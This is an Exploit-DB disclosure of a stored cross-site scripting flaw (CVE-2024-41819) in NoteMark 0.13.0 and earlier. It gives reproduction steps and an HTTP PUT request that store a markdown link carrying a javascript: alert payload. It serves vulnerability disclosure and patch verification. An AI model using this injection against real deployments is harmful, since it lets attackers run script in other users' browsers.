NoteMark < 0.13.0 - Stored XSS

  • Author: Alessio Romano (sfoffo)
  • Date: 2024-08-28
  • Source: https://www.exploit-db.com/exploits/52078/
# Exploit Title: Stored XSS in NoteMark
# Date: 07/29/2024
# Exploit Author: Alessio Romano (sfoffo)
# Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/
# Version: 0.13.0 and below
# Tested on: Linux
# References:
# https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819
# https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182
# https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3
# CVE: CVE-2024-41819
    
## Steps to Reproduce

1. Log in to the application.
2. Create a new note or open a previously created note.
3. Open the note editor for the selected note by clicking the "Editor" tab.
4. Enter the following payload:
   [xss-link](javascript:alert(1))
5. Save the changes.
6. Click the "Rendered" tab to view the rendered markdown version of the note, then click the link created above to trigger the injected alert.
    
## HTTP Request PoC

PUT /api/notes/<note-uuid>/content HTTP/1.1
Host: localhost:8000
Accept: */*
Content-Type: text/plain;charset=UTF-8
Content-Length: 34
Sec-Fetch-Site: same-origin
Authorization: Bearer <TOKEN>

[xss-link](javascript:alert(1))